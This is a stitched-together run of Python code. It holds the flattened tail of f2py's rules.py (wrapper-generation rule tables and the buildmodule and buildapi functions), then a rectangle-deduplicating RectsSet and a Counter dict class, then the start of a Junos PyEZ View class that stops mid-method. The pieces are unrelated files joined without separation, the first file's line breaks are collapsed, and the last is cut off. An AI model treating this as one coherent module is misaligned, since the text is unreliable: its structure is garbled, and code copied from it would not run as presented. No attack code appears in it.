# from_pyobj(varname) # {hasinitvalue:'\tif (#varname#_capi == Py_None) #varname# = #init#; else', '_depend':''}, {l_and(isoptional,l_not(hasinitvalue)):'\tif (#varname#_capi != Py_None)', '_depend':''}, {l_not(islogical):'''\ \t\tf2py_success = #ctype#_from_pyobj(&#varname#,#varname#_capi,"#pyname#() #nth# (#varname#) can\'t be converted to #ctype#"); \tif (f2py_success) {'''}, {islogical:'''\ \t\t#varname# = (#ctype#)PyObject_IsTrue(#varname#_capi); \t\tf2py_success = 1; \tif (f2py_success) {'''}, ], 'cleanupfrompyobj':'\t} /*if (f2py_success) of #varname#*/', 'need':{l_not(islogical):'#ctype#_from_pyobj'}, '_check':l_and(isscalar,l_not(iscomplex),isintent_nothide), '_depend':'' # },{ # Hidden # '_check':l_and(isscalar,l_not(iscomplex),isintent_hide) },{ # Hidden 'frompyobj':{hasinitvalue:'\t#varname# = #init#;'}, 'need':typedef_need_dict, '_check':l_and(isscalar,l_not(iscomplex),isintent_hide), '_depend':'' },{ # Common 'frompyobj':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#);'}, '_check':l_and(isscalar,l_not(iscomplex)), '_depend':'' }, # Complex scalars { # Common 'decl':'\t#ctype# #varname#;', 'callfortran':{isintent_c:'#varname#,',l_not(isintent_c):'&#varname#,'}, 'pyobjfrom':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#.r,#varname#.i);'}, 'return':{isintent_out:',#varname#_capi'}, '_check':iscomplex },{ # Not hidden 'decl':'\tPyObject *#varname#_capi = Py_None;', 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'need':{isintent_inout:'try_pyarr_from_#ctype#'}, 'pyobjfrom':{isintent_inout:"""\ \t\tf2py_success = try_pyarr_from_#ctype#(#varname#_capi,&#varname#); \t\tif (f2py_success) {"""}, 'closepyobjfrom':{isintent_inout:"\t\t} /*if (f2py_success) of #varname# pyobjfrom*/"}, '_check':l_and(iscomplex,isintent_nothide) },{ 'frompyobj':[{hasinitvalue:'\tif (#varname#_capi==Py_None) {#varname#.r = #init.r#, #varname#.i = 
#init.i#;} else'}, {l_and(isoptional,l_not(hasinitvalue)):'\tif (#varname#_capi != Py_None)'}, # '\t\tf2py_success = #ctype#_from_pyobj(&#varname#,#varname#_capi,"#ctype#_from_pyobj failed in converting #nth# `#varname#\' of #pyname# to C #ctype#\\n");' '\t\tf2py_success = #ctype#_from_pyobj(&#varname#,#varname#_capi,"#pyname#() #nth# (#varname#) can\'t be converted to #ctype#");' '\n\tif (f2py_success) {'], 'cleanupfrompyobj':'\t} /*if (f2py_success) of #varname# frompyobj*/', 'need':['#ctype#_from_pyobj'], '_check':l_and(iscomplex,isintent_nothide), '_depend':'' },{ # Hidden 'decl':{isintent_out:'\tPyObject *#varname#_capi = Py_None;'}, '_check':l_and(iscomplex,isintent_hide) },{ 'frompyobj': {hasinitvalue:'\t#varname#.r = #init.r#, #varname#.i = #init.i#;'}, '_check':l_and(iscomplex,isintent_hide), '_depend':'' },{ # Common 'pyobjfrom':{isintent_out:'\t#varname#_capi = pyobj_from_#ctype#1(#varname#);'}, 'need':['pyobj_from_#ctype#1'], '_check':iscomplex },{ 'frompyobj':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#.r,#varname#.i);'}, '_check':iscomplex, '_depend':'' }, # String { # Common 'decl':['\t#ctype# #varname# = NULL;', '\tint slen(#varname#);', '\tPyObject *#varname#_capi = Py_None;'], 'callfortran':'#varname#,', 'callfortranappend':'slen(#varname#),', 'pyobjfrom':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",slen(#varname#),#varname#);'}, # 'freemem':'\tSTRINGFREE(#varname#);', 'return':{isintent_out:',#varname#'}, 'need':['len..'],#'STRINGFREE'], '_check':isstring },{ # Common 'frompyobj':"""\ \tslen(#varname#) = #length#; \tf2py_success = #ctype#_from_pyobj(&#varname#,&slen(#varname#),#init#,#varname#_capi,\"#ctype#_from_pyobj failed in converting #nth# `#varname#\' of #pyname# to C #ctype#\"); \tif (f2py_success) {""", 'cleanupfrompyobj':"""\ \t\tSTRINGFREE(#varname#); \t} /*if (f2py_success) of #varname#*/""", 'need':['#ctype#_from_pyobj','len..','STRINGFREE'], '_check':isstring, '_depend':'' },{ # Not hidden 
'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'pyobjfrom':{isintent_inout:'''\ \tf2py_success = try_pyarr_from_#ctype#(#varname#_capi,#varname#); \tif (f2py_success) {'''}, 'closepyobjfrom':{isintent_inout:'\t} /*if (f2py_success) of #varname# pyobjfrom*/'}, 'need':{isintent_inout:'try_pyarr_from_#ctype#'}, '_check':l_and(isstring,isintent_nothide) },{ # Hidden '_check':l_and(isstring,isintent_hide) },{ 'frompyobj':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",slen(#varname#),#varname#);'}, '_check':isstring, '_depend':'' }, # Array { # Common 'decl':['\t#ctype# *#varname# = NULL;', '\tnpy_intp #varname#_Dims[#rank#] = {#rank*[-1]#};', '\tconst int #varname#_Rank = #rank#;', '\tPyArrayObject *capi_#varname#_tmp = NULL;', '\tint capi_#varname#_intent = 0;', ], 'callfortran':'#varname#,', 'return':{isintent_out:',capi_#varname#_tmp'}, 'need':'len..', '_check':isarray },{ # intent(overwrite) array 'decl':'\tint capi_overwrite_#varname# = 1;', 'kwlistxa':'"overwrite_#varname#",', 'xaformat':'i', 'keys_xa':',&capi_overwrite_#varname#', 'docsignxa':'overwrite_#varname#=1,', 'docsignxashort':'overwrite_#varname#,', 'docstropt':'\toverwrite_#varname# := 1 input int', '_check':l_and(isarray,isintent_overwrite), },{ 'frompyobj':'\tcapi_#varname#_intent |= (capi_overwrite_#varname#?0:F2PY_INTENT_COPY);', '_check':l_and(isarray,isintent_overwrite), '_depend':'', }, { # intent(copy) array 'decl':'\tint capi_overwrite_#varname# = 0;', 'kwlistxa':'"overwrite_#varname#",', 'xaformat':'i', 'keys_xa':',&capi_overwrite_#varname#', 'docsignxa':'overwrite_#varname#=0,', 'docsignxashort':'overwrite_#varname#,', 'docstropt':'\toverwrite_#varname# := 0 input int', '_check':l_and(isarray,isintent_copy), },{ 'frompyobj':'\tcapi_#varname#_intent |= (capi_overwrite_#varname#?0:F2PY_INTENT_COPY);', '_check':l_and(isarray,isintent_copy), '_depend':'', },{ 
'need':[{hasinitvalue:'forcomb'},{hasinitvalue:'CFUNCSMESS'}], '_check':isarray, '_depend':'' },{ # Not hidden 'decl':'\tPyObject *#varname#_capi = Py_None;', 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, # 'pyobjfrom':{isintent_inout:"""\ # /* Partly because of the following hack, intent(inout) is depreciated, # Use intent(in,out) instead. # \tif ((#varname#_capi != Py_None) && PyArray_Check(#varname#_capi) \\ # \t\t&& (#varname#_capi != (PyObject *)capi_#varname#_tmp)) { # \t\tif (((PyArrayObject *)#varname#_capi)->nd != capi_#varname#_tmp->nd) { # \t\t\tif (#varname#_capi != capi_#varname#_tmp->base) # \t\t\t\tcopy_ND_array((PyArrayObject *)capi_#varname#_tmp->base,(PyArrayObject *)#varname#_capi); # \t\t} else # \t\t\tcopy_ND_array(capi_#varname#_tmp,(PyArrayObject *)#varname#_capi); # \t} # */ # """}, # 'need':{isintent_inout:'copy_ND_array'}, '_check':l_and(isarray,isintent_nothide) },{ 'frompyobj':['\t#setdims#;', '\tcapi_#varname#_intent |= #intent#;', {isintent_hide:'\tcapi_#varname#_tmp = array_from_pyobj(#atype#,#varname#_Dims,#varname#_Rank,capi_#varname#_intent,Py_None);'}, {isintent_nothide:'\tcapi_#varname#_tmp = array_from_pyobj(#atype#,#varname#_Dims,#varname#_Rank,capi_#varname#_intent,#varname#_capi);'}, """\ \tif (capi_#varname#_tmp == NULL) { \t\tif (!PyErr_Occurred()) \t\t\tPyErr_SetString(#modulename#_error,\"failed in converting #nth# `#varname#\' of #pyname# to C/Fortran array\" ); \t} else { \t\t#varname# = (#ctype# *)(capi_#varname#_tmp->data); """, {hasinitvalue:[ {isintent_nothide:'\tif (#varname#_capi == Py_None) {'}, {isintent_hide:'\t{'}, {iscomplexarray:'\t\t#ctype# capi_c;'}, """\ \t\tint *_i,capi_i=0; \t\tCFUNCSMESS(\"#name#: Initializing #varname#=#init#\\n\"); \t\tif (initforcomb(capi_#varname#_tmp->dimensions,capi_#varname#_tmp->nd,1)) { \t\t\twhile ((_i = nextforcomb())) \t\t\t\t#varname#[capi_i++] = #init#; /* fortran way 
*/ \t\t} else { \t\t\tif (!PyErr_Occurred()) \t\t\t\tPyErr_SetString(#modulename#_error,\"Initialization of #nth# #varname# failed (initforcomb).\"); \t\t\tf2py_success = 0; \t\t} \t} \tif (f2py_success) {"""]}, ], 'cleanupfrompyobj':[ # note that this list will be reversed '\t} /*if (capi_#varname#_tmp == NULL) ... else of #varname#*/', {l_not(l_or(isintent_out,isintent_hide)):"""\ \tif((PyObject *)capi_#varname#_tmp!=#varname#_capi) { \t\tPy_XDECREF(capi_#varname#_tmp); }"""}, {l_and(isintent_hide,l_not(isintent_out)):"""\t\tPy_XDECREF(capi_#varname#_tmp);"""}, {hasinitvalue:'\t} /*if (f2py_success) of #varname# init*/'}, ], '_check':isarray, '_depend':'' }, # { # Hidden # 'freemem':{l_not(isintent_out):'\tPy_XDECREF(capi_#varname#_tmp);'}, # '_check':l_and(isarray,isintent_hide) # }, # Scalararray { # Common '_check':l_and(isarray,l_not(iscomplexarray)) },{ # Not hidden '_check':l_and(isarray,l_not(iscomplexarray),isintent_nothide) }, # Integer*1 array {'need':'#ctype#', '_check':isint1array, '_depend':'' }, # Integer*-1 array {'need':'#ctype#', '_check':isunsigned_chararray, '_depend':'' }, # Integer*-2 array {'need':'#ctype#', '_check':isunsigned_shortarray, '_depend':'' }, # Integer*-8 array {'need':'#ctype#', '_check':isunsigned_long_longarray, '_depend':'' }, # Complexarray {'need':'#ctype#', '_check':iscomplexarray, '_depend':'' }, # Stringarray { 'callfortranappend':{isarrayofstrings:'flen(#varname#),'}, 'need':'string', '_check':isstringarray } ] ################# Rules for checking ############### check_rules=[ { 'frompyobj':{debugcapi:'\tfprintf(stderr,\"debug-capi:Checking `#check#\'\\n\");'}, 'need':'len..' 
},{ 'frompyobj':'\tCHECKSCALAR(#check#,\"#check#\",\"#nth# #varname#\",\"#varshowvalue#\",#varname#) {', 'cleanupfrompyobj':'\t} /*CHECKSCALAR(#check#)*/', 'need':'CHECKSCALAR', '_check':l_and(isscalar,l_not(iscomplex)), '_break':'' },{ 'frompyobj':'\tCHECKSTRING(#check#,\"#check#\",\"#nth# #varname#\",\"#varshowvalue#\",#varname#) {', 'cleanupfrompyobj':'\t} /*CHECKSTRING(#check#)*/', 'need':'CHECKSTRING', '_check':isstring, '_break':'' },{ 'need':'CHECKARRAY', 'frompyobj':'\tCHECKARRAY(#check#,\"#check#\",\"#nth# #varname#\") {', 'cleanupfrompyobj':'\t} /*CHECKARRAY(#check#)*/', '_check':isarray, '_break':'' },{ 'need':'CHECKGENERIC', 'frompyobj':'\tCHECKGENERIC(#check#,\"#check#\",\"#nth# #varname#\") {', 'cleanupfrompyobj':'\t} /*CHECKGENERIC(#check#)*/', } ] ########## Applying the rules. No need to modify what follows ############# #################### Build C/API module ####################### def buildmodule(m,um): """ Return """ global f2py_version,options outmess('\tBuilding module "%s"...\n'%(m['name'])) ret = {} mod_rules=defmod_rules[:] vrd=modsign2map(m) rd=dictappend({'f2py_version':f2py_version},vrd) funcwrappers = [] funcwrappers2 = [] # F90 codes for n in m['interfaced']: nb=None for bi in m['body']: if not bi['block']=='interface': errmess('buildmodule: Expected interface block. Skipping.\n') continue for b in bi['body']: if b['name']==n: nb=b;break if not nb: errmess('buildmodule: Could not found the body of interfaced routine "%s". 
Skipping.\n'%(n)) continue nb_list = [nb] if 'entry' in nb: for k,a in nb['entry'].items(): nb1 = copy.deepcopy(nb) del nb1['entry'] nb1['name'] = k nb1['args'] = a nb_list.append(nb1) for nb in nb_list: api,wrap=buildapi(nb) if wrap: if ismoduleroutine(nb): funcwrappers2.append(wrap) else: funcwrappers.append(wrap) ar=applyrules(api,vrd) rd=dictappend(rd,ar) # Construct COMMON block support cr,wrap = common_rules.buildhooks(m) if wrap: funcwrappers.append(wrap) ar=applyrules(cr,vrd) rd=dictappend(rd,ar) # Construct F90 module support mr,wrap = f90mod_rules.buildhooks(m) if wrap: funcwrappers2.append(wrap) ar=applyrules(mr,vrd) rd=dictappend(rd,ar) for u in um: ar=use_rules.buildusevars(u,m['use'][u['name']]) rd=dictappend(rd,ar) needs=cfuncs.get_needs() code={} for n in needs.keys(): code[n]=[] for k in needs[n]: c='' if k in cfuncs.includes0: c=cfuncs.includes0[k] elif k in cfuncs.includes: c=cfuncs.includes[k] elif k in cfuncs.userincludes: c=cfuncs.userincludes[k] elif k in cfuncs.typedefs: c=cfuncs.typedefs[k] elif k in cfuncs.typedefs_generated: c=cfuncs.typedefs_generated[k] elif k in cfuncs.cppmacros: c=cfuncs.cppmacros[k] elif k in cfuncs.cfuncs: c=cfuncs.cfuncs[k] elif k in cfuncs.callbacks: c=cfuncs.callbacks[k] elif k in cfuncs.f90modhooks: c=cfuncs.f90modhooks[k] elif k in cfuncs.commonhooks: c=cfuncs.commonhooks[k] else: errmess('buildmodule: unknown need %s.\n'%(`k`));continue code[n].append(c) mod_rules.append(code) for r in mod_rules: if ('_check' in r and r['_check'](m)) or ('_check' not in r): ar=applyrules(r,vrd,m) rd=dictappend(rd,ar) ar=applyrules(module_rules,rd) fn = os.path.join(options['buildpath'],vrd['modulename']+'module.c') ret['csrc'] = fn f=open(fn,'w') f.write(ar['modulebody'].replace('\t',2*' ')) f.close() outmess('\tWrote C/API module "%s" to file "%s/%smodule.c"\n'%(m['name'],options['buildpath'],vrd['modulename'])) if options['dorestdoc']: fn = os.path.join(options['buildpath'],vrd['modulename']+'module.rest') f=open(fn,'w') 
f.write('.. -*- rest -*-\n') f.write('\n'.join(ar['restdoc'])) f.close() outmess('\tReST Documentation is saved to file "%s/%smodule.rest"\n'%(options['buildpath'],vrd['modulename'])) if options['dolatexdoc']: fn = os.path.join(options['buildpath'],vrd['modulename']+'module.tex') ret['ltx'] = fn f=open(fn,'w') f.write('%% This file is auto-generated with f2py (version:%s)\n'%(f2py_version)) if 'shortlatex' not in options: f.write('\\documentclass{article}\n\\usepackage{a4wide}\n\\begin{document}\n\\tableofcontents\n\n') f.write('\n'.join(ar['latexdoc'])) if 'shortlatex' not in options: f.write('\\end{document}') f.close() outmess('\tDocumentation is saved to file "%s/%smodule.tex"\n'%(options['buildpath'],vrd['modulename'])) if funcwrappers: wn = os.path.join(options['buildpath'],'%s-f2pywrappers.f'%(vrd['modulename'])) ret['fsrc'] = wn f=open(wn,'w') f.write('C -*- fortran -*-\n') f.write('C This file is autogenerated with f2py (version:%s)\n'%(f2py_version)) f.write('C It contains Fortran 77 wrappers to fortran functions.\n') lines = [] for l in ('\n\n'.join(funcwrappers)+'\n').split('\n'): if l and l[0]==' ': while len(l)>=66: lines.append(l[:66]+'\n &') l = l[66:] lines.append(l+'\n') else: lines.append(l+'\n') lines = ''.join(lines).replace('\n &\n','\n') f.write(lines) f.close() outmess('\tFortran 77 wrappers are saved to "%s"\n'%(wn)) if funcwrappers2: wn = os.path.join(options['buildpath'],'%s-f2pywrappers2.f90'%(vrd['modulename'])) ret['fsrc'] = wn f=open(wn,'w') f.write('! -*- f90 -*-\n') f.write('! This file is autogenerated with f2py (version:%s)\n'%(f2py_version)) f.write('! 
It contains Fortran 90 wrappers to fortran functions.\n') lines = [] for l in ('\n\n'.join(funcwrappers2)+'\n').split('\n'): if len(l)>72 and l[0]==' ': lines.append(l[:72]+'&\n &') l = l[72:] while len(l)>66: lines.append(l[:66]+'&\n &') l = l[66:] lines.append(l+'\n') else: lines.append(l+'\n') lines = ''.join(lines).replace('\n &\n','\n') f.write(lines) f.close() outmess('\tFortran 90 wrappers are saved to "%s"\n'%(wn)) return ret ################## Build C/API function ############# stnd={1:'st',2:'nd',3:'rd',4:'th',5:'th',6:'th',7:'th',8:'th',9:'th',0:'th'} def buildapi(rout): rout,wrap = func2subr.assubr(rout) args,depargs=getargs2(rout) capi_maps.depargs=depargs var=rout['vars'] auxvars = [a for a in var.keys() if isintent_aux(var[a])] if ismoduleroutine(rout): outmess('\t\t\tConstructing wrapper function "%s.%s"...\n'%(rout['modulename'],rout['name'])) else: outmess('\t\tConstructing wrapper function "%s"...\n'%(rout['name'])) # Routine vrd=routsign2map(rout) rd=dictappend({},vrd) for r in rout_rules: if ('_check' in r and r['_check'](rout)) or ('_check' not in r): ar=applyrules(r,vrd,rout) rd=dictappend(rd,ar) # Args nth,nthk=0,0 savevrd={} for a in args: vrd=sign2map(a,var[a]) if isintent_aux(var[a]): _rules = aux_rules else: _rules = arg_rules if not isintent_hide(var[a]): if not isoptional(var[a]): nth=nth+1 vrd['nth']=`nth`+stnd[nth%10]+' argument' else: nthk=nthk+1 vrd['nth']=`nthk`+stnd[nthk%10]+' keyword' else: vrd['nth']='hidden' savevrd[a]=vrd for r in _rules: if '_depend' in r: continue if ('_check' in r and r['_check'](var[a])) or ('_check' not in r): ar=applyrules(r,vrd,var[a]) rd=dictappend(rd,ar) if '_break' in r: break for a in depargs: if isintent_aux(var[a]): _rules = aux_rules else: _rules = arg_rules vrd=savevrd[a] for r in _rules: if '_depend' not in r: continue if ('_check' in r and r['_check'](var[a])) or ('_check' not in r): ar=applyrules(r,vrd,var[a]) rd=dictappend(rd,ar) if '_break' in r: break if 'check' in var[a]: for c in 
var[a]['check']: vrd['check']=c ar=applyrules(check_rules,vrd,var[a]) rd=dictappend(rd,ar) if type(rd['cleanupfrompyobj']) is types.ListType: rd['cleanupfrompyobj'].reverse() if type(rd['closepyobjfrom']) is types.ListType: rd['closepyobjfrom'].reverse() rd['docsignature']=stripcomma(replace('#docsign##docsignopt##docsignxa#', {'docsign':rd['docsign'], 'docsignopt':rd['docsignopt'], 'docsignxa':rd['docsignxa']})) optargs=stripcomma(replace('#docsignopt##docsignxa#', {'docsignxa':rd['docsignxashort'], 'docsignopt':rd['docsignoptshort']} )) if optargs=='': rd['docsignatureshort']=stripcomma(replace('#docsign#',{'docsign':rd['docsign']})) else: rd['docsignatureshort']=replace('#docsign#[#docsignopt#]', {'docsign':rd['docsign'], 'docsignopt':optargs, }) rd['latexdocsignatureshort']=rd['docsignatureshort'].replace('_','\\_') rd['latexdocsignatureshort']=rd['latexdocsignatureshort'].replace(',',', ') cfs=stripcomma(replace('#callfortran##callfortranappend#',{'callfortran':rd['callfortran'],'callfortranappend':rd['callfortranappend']})) if len(rd['callfortranappend'])>1: rd['callcompaqfortran']=stripcomma(replace('#callfortran# 0,#callfortranappend#',{'callfortran':rd['callfortran'],'callfortranappend':rd['callfortranappend']})) else: rd['callcompaqfortran']=cfs rd['callfortran']=cfs if type(rd['docreturn'])==types.ListType: rd['docreturn']=stripcomma(replace('#docreturn#',{'docreturn':rd['docreturn']}))+' = ' rd['docstrsigns']=[] rd['latexdocstrsigns']=[] for k in ['docstrreq','docstropt','docstrout','docstrcbs']: if k in rd and type(rd[k])==types.ListType: rd['docstrsigns']=rd['docstrsigns']+rd[k] k='latex'+k if k in rd and type(rd[k])==types.ListType: rd['latexdocstrsigns']=rd['latexdocstrsigns']+rd[k][0:1]+\ ['\\begin{description}']+rd[k][1:]+\ ['\\end{description}'] # Workaround for Python 2.6, 2.6.1 bug: http://bugs.python.org/issue4720 if rd['keyformat'] or rd['xaformat']: argformat = rd['argformat'] if isinstance(argformat, list): argformat.append('|') else: 
assert isinstance(argformat, str),repr((argformat, type(argformat))) rd['argformat'] += '|' ar=applyrules(routine_rules,rd) if ismoduleroutine(rout): outmess('\t\t\t %s\n'%(ar['docshort'])) else: outmess('\t\t %s\n'%(ar['docshort'])) return ar,wrap #################### EOF rules.py #######################
try:
    # collections.abc since Python 3.3; the bare collections alias was
    # removed in Python 3.10.  Fall back for Python 2 (matches the
    # try/except import-compat style used elsewhere in this file).
    from collections.abc import MutableSet
except ImportError:
    from collections import MutableSet
from math import hypot


def _build_variant(cls, opname):
    """Return a method delegating to the operator *opname* on *cls*.

    The returned method first coerces a plain iterable argument into the
    caller's own set type, which lets the inherited operator dunders
    (``__and__``, ``__or__``, ...) double as the named set API
    (``intersection``, ``union``, ...).
    """
    fn = getattr(cls, opname)
    # Python 2 exposes class attributes as unbound methods; unwrap to the
    # raw function so it can be re-bound on a different class.
    if hasattr(fn, 'im_func'):
        fn = fn.im_func

    def method(self, other, fn=fn):
        if not isinstance(other, MutableSet):
            # Build a set of the same concrete type from the iterable.
            other = self._from_iterable(other)
        return fn(self, other)
    return method


class RectsSet(MutableSet):
    """A set of rectangles ``(x1, y1, x2, y2)`` detected in an image.

    Two rectangles are treated as duplicates when their centers lie
    within ``_MIN_CENTER_DIST`` pixels of each other; adding a
    near-duplicate is a silent no-op.
    """

    # Minimum center-to-center distance (pixels) for two rectangles to be
    # considered distinct.  Was a hard-coded 10 inside add().
    _MIN_CENTER_DIST = 10

    # Named set-API aliases for the inherited operator implementations.
    intersection = _build_variant(MutableSet, '__and__')
    union = _build_variant(MutableSet, '__or__')
    difference = _build_variant(MutableSet, '__sub__')
    symmetric_difference = _build_variant(MutableSet, '__xor__')
    issubset = _build_variant(MutableSet, '__le__')
    issuperset = _build_variant(MutableSet, '__ge__')
    intersection_update = _build_variant(MutableSet, '__iand__')
    update = _build_variant(MutableSet, '__ior__')
    difference_update = _build_variant(MutableSet, '__isub__')
    symmetric_difference_update = _build_variant(MutableSet, '__ixor__')

    def __init__(self, initVal=()):
        """Build the set, funnelling every initial item through add()."""
        self.mySet = set()
        for x in initVal:
            self.add(x)

    @staticmethod
    def _center(rect):
        """Integer center point of an (x1, y1, x2, y2) rectangle."""
        return (int((rect[0] + rect[2]) / 2.0),
                int((rect[1] + rect[3]) / 2.0))

    def add(self, otherRect):
        """Add *otherRect* unless an existing rectangle's center is
        within _MIN_CENTER_DIST pixels of its center."""
        cx, cy = self._center(otherRect)
        for rect in self.mySet:
            rx, ry = self._center(rect)
            if hypot(rx - cx, ry - cy) < self._MIN_CENTER_DIST:
                return  # near-duplicate; keep the existing rectangle
        self.mySet.add(otherRect)

    def __contains__(self, x):
        # BUG FIX: was `x in self.mySet()`, which calls the set object
        # and raises TypeError on every membership test.
        return x in self.mySet

    def __len__(self):
        return len(self.mySet)

    def __iter__(self):
        return iter(self.mySet)

    def discard(self, x):
        """Remove *x* if present; silently ignore a missing element."""
        self.mySet.discard(x)


class Counter(dict):
    """
    A counter keeps track of counts for a set of keys.

    The counter class is an extension of the standard python
    dictionary type.  It is specialized to have number values
    (integers or floats), and includes a handful of additional
    functions to ease the task of counting data.  In particular,
    all keys are defaulted to have value 0.  Using a dictionary:

    a = {}
    print(a['test'])

    would give an error, while the Counter class analogue:

    >>> a = Counter()
    >>> print(a['test'])
    0

    returns the default 0 value. Note that to reference a key
    that you know is contained in the counter,
    you can still use the dictionary syntax:

    >>> a = Counter()
    >>> a['test'] = 2
    >>> print(a['test'])
    2

    This is very useful for counting things without initializing their
    counts, see for example:

    >>> a['blah'] += 1
    >>> print(a['blah'])
    1

    The counter also includes additional functionality useful in
    implementing the classifiers for this assignment.  Two counters can
    be added, subtracted or multiplied together.  See below for details.
    They can also be normalized and their total count and arg max can be
    extracted.
    """

    def __getitem__(self, idx):
        # Default every key to 0 so `c[k] += 1` works on fresh keys.
        self.setdefault(idx, 0)
        return dict.__getitem__(self, idx)

    def incrementAll(self, keys, count):
        """
        Increments all elements of keys by the same count.

        >>> a = Counter()
        >>> a.incrementAll(['one', 'two', 'three'], 1)
        >>> a['one']
        1
        >>> a['two']
        1
        """
        for key in keys:
            self[key] += count

    def argMax(self):
        """
        Returns the key with the highest value (ties broken by
        insertion order), or None if the counter is empty.
        """
        # Previous version shadowed the builtin `all` and indexed
        # self.items(), which is not subscriptable on Python 3.
        if not self:
            return None
        return max(self.items(), key=lambda item: item[1])[0]

    def sortedKeys(self):
        """
        Returns a list of keys sorted by their values.  Keys with the
        highest values will appear first.

        >>> a = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> a['third'] = 1
        >>> a.sortedKeys()
        ['second', 'third', 'first']
        """
        # sorted() is stable even with reverse=True, matching the old
        # sign()-based cmp sort (which is unavailable on Python 3).
        return [key for key, _ in
                sorted(self.items(), key=lambda item: item[1], reverse=True)]

    def totalCount(self):
        """
        Returns the sum of counts for all keys.
        """
        return sum(self.values())

    def normalize(self):
        """
        Edits the counter such that the total count of all
        keys sums to 1.  The ratio of counts for all keys
        will remain the same. Note that normalizing an empty
        Counter will result in an error.
        """
        total = float(self.totalCount())
        if total == 0:
            return
        # Snapshot the keys: assigning during view iteration is fragile.
        for key in list(self.keys()):
            self[key] = self[key] / total

    def divideAll(self, divisor):
        """
        Divides all counts by divisor
        """
        divisor = float(divisor)
        for key in self:
            self[key] /= divisor

    def copy(self):
        """
        Returns a copy of the counter
        """
        return Counter(dict.copy(self))

    def __mul__(self, y):
        """
        Multiplying two counters gives the dot product of their vectors
        where each unique label is a vector element.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['second'] = 5
        >>> a['third'] = 1.5
        >>> a['fourth'] = 2.5
        >>> a * b
        14
        """
        total = 0
        x = self
        # Iterate over the smaller counter; lookup in the larger one.
        if len(x) > len(y):
            x, y = y, x
        for key in x:
            if key not in y:
                continue
            total += x[key] * y[key]
        return total

    def __radd__(self, y):
        """
        Adding another counter to a counter increments the current counter
        by the values stored in the second counter.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['third'] = 1
        >>> a += b
        >>> a['first']
        1
        """
        # NOTE(review): mutates self in place and returns None — unusual
        # for __radd__, but preserved as-is since callers may rely on it.
        for key, value in y.items():
            self[key] += value

    def __add__(self, y):
        """
        Adding two counters gives a counter with the union of all keys and
        counts of the second added to counts of the first.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['third'] = 1
        >>> (a + b)['first']
        1
        """
        addend = Counter()
        for key in self:
            if key in y:
                addend[key] = self[key] + y[key]
            else:
                addend[key] = self[key]
        for key in y:
            if key in self:
                continue
            addend[key] = y[key]
        return addend

    def __sub__(self, y):
        """
        Subtracting a counter from another gives a counter with the union
        of all keys and counts of the second subtracted from counts of the
        first.

        >>> a = Counter()
        >>> b = Counter()
        >>> a['first'] = -2
        >>> a['second'] = 4
        >>> b['first'] = 3
        >>> b['third'] = 1
        >>> (a - b)['first']
        -5
        """
        addend = Counter()
        for key in self:
            if key in y:
                addend[key] = self[key] - y[key]
            else:
                addend[key] = self[key]
        for key in y:
            if key in self:
                continue
            addend[key] = -1 * y[key]
        return addend
import warnings
from contextlib import contextmanager
from copy import deepcopy

from lxml import etree
import json
import sys

from jnpr.junos.factory.viewfields import ViewFields
from jnpr.junos.factory.to_json import TableViewJSONEncoder


class View(object):
    """
    View is the base-class that makes extracting values from XML
    data appear as objects with attributes.
    """
    # default xpath used to extract an item's key/name from its XML
    ITEM_NAME_XPATH = 'name'
    # mapping of attribute name -> field definition dict (xpath, astype, ...)
    FIELDS = {}
    # optional mapping of group name -> xpath, resolved once in _init_xml
    GROUPS = None

    # -------------------------------------------------------------------------
    # CONSTRUCTOR
    # -------------------------------------------------------------------------

    def __init__(self, table, view_xml):
        """
        :table: instance of the RunstatTable
        :view_xml: this should be an lxml etree Elemenet object.  This
        constructor also accepts a list with a single item/XML
        """
        # if as_xml is passed as a list, make sure it only has
        # a single item, common response from an xpath search
        if isinstance(view_xml, list):
            if 1 == len(view_xml):
                view_xml = view_xml[0]
            else:
                raise ValueError("constructor only accepts a single item")

        # now ensure that the thing provided is an lxml etree Element
        if not isinstance(view_xml, etree._Element):
            raise ValueError("constructor only accecpts lxml.etree._Element")

        self._table = table
        self.ITEM_NAME_XPATH = table.ITEM_NAME_XPATH
        self._init_xml(view_xml)

    def _init_xml(self, given_xml):
        # Bind the backing XML and resolve each GROUPS xpath to its first
        # matching element so field lookups can be scoped to a group.
        self._xml = given_xml
        if self.GROUPS is not None:
            self._groups = {}
            for xg_name, xg_xpath in self.GROUPS.items():
                xg_xml = self._xml.xpath(xg_xpath)
                # @@@ this is technically an error; need to trap it
                if not len(xg_xml):
                    continue
                self._groups[xg_name] = xg_xml[0]

    # -------------------------------------------------------------------------
    # PROPERTIES
    # -------------------------------------------------------------------------

    @property
    def T(self):
        """ return the Table instance for the View """
        return self._table

    @property
    def D(self):
        """ return the Device instance for this View """
        return self.T.D

    @property
    def name(self):
        """ return the name of view item """
        if self.ITEM_NAME_XPATH is None:
            return self._table.D.hostname
        if isinstance(self.ITEM_NAME_XPATH, str):
            # xpath union key
            if ' | ' in self.ITEM_NAME_XPATH:
                return self._xml.xpath(self.ITEM_NAME_XPATH)[0].text.strip()
            # simple key
            return self._xml.findtext(self.ITEM_NAME_XPATH).strip()
        else:
            # composite key
            # keys with missing XPATH nodes are set to None
            keys = []
            for i in self.ITEM_NAME_XPATH:
                # NOTE(review): bare except maps *any* failure (missing node,
                # None text, bad xpath) to a None key component -- confirm
